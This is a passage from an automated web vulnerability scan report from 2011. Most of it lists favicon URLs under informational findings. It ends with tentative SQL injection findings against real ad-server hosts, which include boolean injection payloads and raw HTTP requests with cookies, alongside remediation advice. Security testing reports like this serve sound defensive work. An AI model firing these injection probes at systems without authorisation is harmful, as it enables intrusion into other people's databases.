26.706. http://www.mshsl.org/favicon.ico

26.707. http://www.mtsac.edu/favicon.ico

26.708. http://www.mtv.ca/favicon.ico

26.709. http://www.musclepricecars.com/favicon.ico

26.710. http://www.muskingum.edu/favicon.ico

26.711. http://www.mustangevolution.com/favicon.ico

26.712. http://www.mutualofamerica.com/favicon.ico

26.713. http://www.mychances.net/favicon.ico

26.714. http://www.mycraftcoupons.com/favicon.ico

26.715. http://www.mycurves.com/favicon.ico

26.716. http://www.myefficientplanet.com/favicon.ico

26.717. http://www.myezdeal.com/favicon.ico

26.718. http://www.myfamilytalk.com/favicon.ico

26.719. http://www.myfreecreditscore.com/favicon.ico

26.720. http://www.myfreedegree.com/favicon.ico

26.721. http://www.myhealthycat.com/favicon.ico

26.722. http://www.myip.org/favicon.ico

26.723. http://www.mylovedanal.tv/favicon.ico

26.724. http://www.mylovedasses.tv/favicon.ico

26.725. http://www.mylovedrubber.com/favicon.ico

26.726. http://www.myrtlebeach.com/favicon.ico

26.727. http://www.mysubtitles.com/favicon.ico

26.728. http://www.mytones.us/favicon.ico

26.729. http://www.mytoolstore.com/favicon.ico

26.730. http://www.nanowerk.com/favicon.ico

26.731. http://www.nationalbuildersupply.com/favicon.ico

26.732. http://www.naturalhealers.com/favicon.ico

26.733. http://www.nccde.org/favicon.ico

26.734. http://www.neaq.org/favicon.ico

26.735. http://www.needlepointers.com/favicon.ico

26.736. http://www.netfit.co.uk/favicon.ico

26.737. http://www.netminers.dk/favicon.ico

26.738. http://www.newholdonsecurity.com/favicon.ico

26.739. http://www.newjerseyshore.com/favicon.ico

26.740. http://www.newregistryrepairreviews.com/favicon.ico

26.741. http://www.newverhost.com/favicon.ico

26.742. http://www.nextmark.com/favicon.ico

26.743. http://www.nextstat.com/favicon.ico

26.744. http://www.nfib.com/favicon.ico

26.745. http://www.nfo.ph/favicon.ico

26.746. http://www.niagarafallsmarriott.com/favicon.ico

26.747. http://www.nic.ru/favicon.ico

26.748. http://www.nikonians.org/favicon.ico

26.749. http://www.nmtc.net/favicon.ico

26.750. http://www.nocccd.edu/favicon.ico

26.751. http://www.northerntrust.com/favicon.ico

26.752. http://www.nowness.com/favicon.ico

26.753. http://www.npdlink.com/favicon.ico

26.754. http://www.nu.nl/favicon.ico

26.755. http://www.nudism.ws/favicon.ico

26.756. http://www.nuffnang.com.au/favicon.ico

26.757. http://www.nwfcu.org/favicon.ico

26.758. http://www.o.biz/favicon.ico

26.759. http://www.oakgov.com/favicon.ico

26.760. http://www.oaktreevintage.com/favicon.ico

26.761. http://www.oceana.org/favicon.ico

26.762. http://www.officefurniture2go.com/favicon.ico

26.763. http://www.okhistory.org/favicon.ico

26.764. http://www.old-yearbooks.com/favicon.ico

26.765. http://www.oldchevytruck.com/favicon.ico

26.766. http://www.onedollaremailoffer.com/favicon.ico

26.767. http://www.onlineradiostations.com/favicon.ico

26.768. http://www.opensubtitles.org/favicon.ico

26.769. http://www.orlandoairports.net/favicon.ico

26.770. http://www.osbornewood.com/favicon.ico

26.771. http://www.osobnosti.cz/favicon.ico

26.772. http://www.our-hometown.com/favicon.ico

26.773. http://www.outdoorsdirectory.com/favicon.ico

26.774. http://www.outsidethebeltway.com/favicon.ico

26.775. http://www.ozgrid.com/favicon.ico

26.776. http://www.paintballforum.com/favicon.ico

26.777. http://www.pakalertpress.com/favicon.ico

26.778. http://www.palmbeachschools.org/favicon.ico

26.779. http://www.paradisefibers.net/favicon.ico

26.780. http://www.pasadena.edu/favicon.ico

26.781. http://www.patioshoppers.com/favicon.ico

26.782. http://www.pay-dayin60seconds.net/favicon.ico

26.783. http://www.paydayin-60seconds.com/favicon.ico

26.784. http://www.paytel.com/favicon.ico

26.785. http://www.pcusa.org/favicon.ico

26.786. http://www.pdfonline.com/favicon.ico

26.787. http://www.pearsonassessments.com/favicon.ico

26.788. http://www.pecentral.org/favicon.ico

26.789. http://www.pentaximaging.com/favicon.ico

26.790. http://www.peoples-law.org/favicon.ico

26.791. http://www.pfiwestern.com/favicon.ico

26.792. http://www.pgcc.edu/favicon.ico

26.793. http://www.philstart.com/favicon.ico


27. Cacheable HTTPS response

28. Multiple content types specified

28.1. http://www.fellowes.com/favicon.ico

28.2. http://www.freeltcquotes.com/favicon.ico

29. HTML does not specify charset


30. HTML uses unrecognised charset

30.1. http://www.aquascapeonline.com/favicon.ico

30.2. http://www.callsource.com/favicon.ico

30.3. http://www.hannspree.com/favicon.ico

30.4. http://www.jared-diamonds.com/favicon.ico

30.5. http://www.manga32.com/favicon.ico

30.6. http://www.mbn.com.ua/favicon.ico

30.7. http://www.qianlong.com/favicon.ico

30.8. http://www.save2pc.com/favicon.ico

31. Content type incorrectly stated


31.147. http://www.localhistories.org/favicon.ico

31.148. http://www.luggagepros.com/favicon.ico

31.149. http://www.lumens.com/favicon.ico

31.150. http://www.lyricsfire.com/favicon.ico

31.151. http://www.manchester2002-uk.com/favicon.ico

31.152. http://www.manycam.com/favicon.ico

31.153. http://www.marijuanaseedbanks.com/favicon.ico

31.154. http://www.marinas.com/favicon.ico

31.155. https://www.mavitunasecurity.com/support/checkupdate/

31.156. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php

31.157. http://www.mbn.com.ua/favicon.ico

31.158. http://www.mbon.org/favicon.ico

31.159. http://www.mcc.edu/favicon.ico

31.160. http://www.meettheboss.tv/favicon.ico

31.161. http://www.memoryx.net/favicon.ico

31.162. http://www.mercadolivre.com.br/favicon.ico

31.163. http://www.mirandalambert.com/favicon.ico

31.164. http://www.mitsubishi-tv.com/favicon.ico

31.165. http://www.modernlinefurniture.com/favicon.ico

31.166. http://www.momsbreak.com/favicon.ico

31.167. http://www.mscd.edu/favicon.ico

31.168. http://www.myaddiction.com/favicon.ico

31.169. http://www.myfreedegree.com/favicon.ico

31.170. http://www.myhealthycat.com/favicon.ico

31.171. http://www.myoutofcontrolteen.com/favicon.ico

31.172. http://www.nascigs.com/favicon.ico

31.173. http://www.naturalhealers.com/favicon.ico

31.174. http://www.neaq.org/favicon.ico

31.175. http://www.newjerseyshore.com/favicon.ico

31.176. http://www.nextstat.com/favicon.ico

31.177. http://www.nikonians.org/favicon.ico

31.178. http://www.nin.com/favicon.ico

31.179. http://www.northstarmls.com/favicon.ico

31.180. http://www.oceana.org/favicon.ico

31.181. http://www.osbornewood.com/favicon.ico

31.182. http://www.osneaker.com/favicon.ico

31.183. http://www.parentsask.com/favicon.ico

31.184. http://www.pemonitorhosted.com/favicon.ico

31.185. http://www.photostockplus.com/favicon.ico

31.186. http://www.piworld.com/favicon.ico

31.187. http://www.pixela.co.jp/favicon.ico

31.188. http://www.plattformpartners.com/favicon.ico

31.189. http://www.poetrynation.com/favicon.ico

31.190. http://www.pokeorder.com/favicon.ico

31.191. http://www.popsugar.co.uk/favicon.ico

31.192. http://www.portalprogramas.com/favicon.ico

31.193. http://www.pponline.co.uk/favicon.ico

31.194. http://www.projectguitar.com/favicon.ico

31.195. http://www.purplepug.com/favicon.ico

31.196. http://www.quizasaurus.com/favicon.ico

31.197. http://www.racerxonline.com/favicon.ico

31.198. http://www.rauantiques.com/favicon.ico

31.199. http://www.realemoexposed.com/favicon.ico

31.200. http://www.realitytvcalendar.com/favicon.ico

31.201. http://www.redlandsdailyfacts.com/favicon.ico

31.202. http://www.remanufactured.com/favicon.ico

31.203. http://www.rugdoctor.com/favicon.ico

31.204. http://www.runningwarehouse.com/favicon.ico

31.205. http://www.sa-venues.com/favicon.ico

31.206. http://www.satellitesales.com/favicon.ico

31.207. http://www.scrapjazz.com/favicon.ico

31.208. http://www.servpro.com/favicon.ico

31.209. http://www.slipstick.com/favicon.ico

31.210. http://www.snaz75.com/favicon.ico

31.211. http://www.soundspectrum.com/favicon.ico

31.212. http://www.speedysigns.com/favicon.ico

31.213. http://www.sportsinjurybulletin.com/favicon.ico

31.214. http://www.srv17.com/favicon.ico

31.215. http://www.stanleyblackanddecker.com/favicon.ico

31.216. http://www.stepbystepcc.com/favicon.ico

31.217. http://www.stereophile.com/favicon.ico

31.218. http://www.stlbeacon.org/favicon.ico

31.219. http://www.stockingsjerk.com/favicon.ico

31.220. http://www.straight.com/favicon.ico

31.221. http://www.studentscholarshipsearch.com/favicon.ico

31.222. http://www.sub5zero.com/favicon.ico

31.223. http://www.superglossary.com/favicon.ico

31.224. http://www.svideo.com/favicon.ico

31.225. http://www.sztaki.hu/favicon.ico

31.226. http://www.tacori.com/favicon.ico

31.227. http://www.tatravelcenters.com/favicon.ico

31.228. http://www.tbd.com/favicon.ico

31.229. http://www.texasbowhunter.com/favicon.ico

31.230. http://www.theacc.com/favicon.ico

31.231. http://www.thefwa.com/favicon.ico

31.232. http://www.theminiaturespage.com/favicon.ico

31.233. http://www.theroyalforums.com/favicon.ico

31.234. http://www.thetelegram.com/favicon.ico

31.235. http://www.time-to-run.com/favicon.ico

31.236. http://www.tinymixtapes.com/favicon.ico

31.237. http://www.tnol.com/favicon.ico

31.238. http://www.top20cool.com/favicon.ico

31.239. http://www.travisa.com/favicon.ico

31.240. http://www.trulyhuge.com/favicon.ico

31.241. http://www.tsihomephone.com/favicon.ico

31.242. http://www.tulalipcasino.com/favicon.ico

31.243. http://www.uniqlo.com/favicon.ico

31.244. http://www.uniquedaily.com/favicon.ico

31.245. http://www.usa1ink.com/favicon.ico

31.246. http://www.usachurches.org/favicon.ico

31.247. http://www.usafootball.com/favicon.ico

31.248. http://www.usagardener.com/favicon.ico

31.249. http://www.uscareerinstitute.edu/favicon.ico

31.250. http://www.uschess.org/favicon.ico

31.251. http://www.verawang.com/favicon.ico

31.252. http://www.vividracing.com/favicon.ico

31.253. http://www.wate.net/favicon.ico

31.254. http://www.web-stat.net/favicon.ico

31.255. http://www.webreference.com/favicon.ico

31.256. http://www.wehaa-ads.com/favicon.ico

31.257. http://www.wellspan.org/favicon.ico

31.258. http://www.wholesalecostumeclub.com/favicon.ico

31.259. http://www.wildernesscollege.com/favicon.ico

31.260. http://www.windows-vista-update.com/favicon.ico

31.261. http://www.winhelponline.com/favicon.ico

31.262. http://www.woodsmith.com/favicon.ico

31.263. http://www.wowtattoos.com/favicon.ico

31.264. http://www.wtma.com/favicon.ico

31.265. http://www.wyyo.com/favicon.ico

31.266. http://www.x-tremegeek.com/favicon.ico

32. Content type is not specified

32.1. http://ads.bluelithium.com/st

32.2. http://pcm1.map.pulsemgr.com/uds/pc

32.3. http://www.actonsoftware.com/favicon.ico

32.4. http://www.ariens.com/favicon.ico

32.5. http://www.bizsiteservice.com/favicon.ico

32.6. http://www.cariboucoffee.com/favicon.ico

32.7. http://www.clubpogo.com/favicon.ico

32.8. http://www.embark.com/favicon.ico

32.9. http://www.freebeerandhotwings.com/favicon.ico

32.10. http://www.fujifilmusa.com/favicon.ico

32.11. http://www.greentreepayday.com/favicon.ico

32.12. http://www.gsmls.com/favicon.ico

32.13. http://www.healthychildren.org/favicon.ico

32.14. http://www.homeawayrealestate.com/favicon.ico

32.15. http://www.homegauge.com/favicon.ico

32.16. http://www.hrs.com/favicon.ico

32.17. http://www.indygov.org/favicon.ico

32.18. http://www.jjc.edu/favicon.ico

32.19. http://www.mercadoclics.com/favicon.ico

32.20. http://www.myleather.com/favicon.ico

32.21. http://www.narrowad.com/favicon.ico

32.22. http://www.navsea.navy.mil/favicon.ico

32.23. http://www.preloved.co.uk/favicon.ico

32.24. http://www.purolatorautofilters.net/favicon.ico

32.25. http://www.rotohog.com/favicon.ico

32.26. http://www.scusd.edu/favicon.ico

32.27. http://www.skyviewzone.com/favicon.ico

32.28. http://www.smithsfoodanddrug.com/favicon.ico

32.29. http://www.softballsavings.com/favicon.ico

32.30. http://www.sueddeutsche.de/favicon.ico

32.31. http://www.thebar.com/favicon.ico

32.32. http://www.viacom.com/favicon.ico

32.33. http://www.vivareal.us/favicon.ico

32.34. http://www.wrinklebest.com/favicon.ico

33. SSL certificate



1. SQL injection
There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 83970435%20or%201%3d1--%20 and 83970435%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 14:48:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 12387390'%20or%201%3d1--%20 and 12387390'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 14:48:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

1.3. http://as.casalemedia.com/j [p parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payloads 14038288'%20or%201%3d1--%20 and 14038288'%20or%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

